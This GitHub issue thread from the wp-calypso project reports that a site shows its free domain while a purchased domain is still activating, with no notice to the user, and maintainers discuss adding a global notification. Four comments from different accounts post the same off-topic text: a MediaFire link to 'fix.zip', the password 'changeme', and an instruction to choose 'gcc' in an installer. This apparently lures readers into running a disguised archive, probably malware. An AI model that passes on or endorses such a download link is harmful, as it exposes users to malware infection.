### ISSUE TITLE
Domain It's not clear why the displayed site domain is not the one I bought

### ISSUE THREAD

**Issue by taipeicoder** [Automattic/wp-calypso#93896]
## Description

See [context](https://wp.me/p58i-hYA/). Jump to the 40:00 mark to see the start of the confusion.

While a domain has been purchased, there is no indication that the user needs to wait for activation. Instead, we display the free domain.

![Image](https://github.com/user-attachments/assets/95b6a3a1-3923-4b08-8897-28e7648b3300)

It's only when we go to the Domains screen that we see that the purchased domain is being activated.

![Image](https://github.com/user-attachments/assets/191ba0ba-2797-4689-88cf-a772d37518c3)

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qlqw233** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by javierarce** [comment]
I think this issue could be connected with [this other one](https://github.com/orgs/Automattic/projects/927/views/2?pane=issue&itemId=76367185) about global notifications.

**Comment by davemart-in** [comment]
Moving this to "Needs design". Do you think you could be a bit more specific about exactly what should be updated here @javierarce?

**Comment by javierarce** [comment]
@davemart-in yes, sorry. At least in the home, I think one thing we are missing is a global notification at the top of the page (we have a similar problem in the issue I linked). 

There are probably other things to improve here, but I'm currently focusing on the other issue.
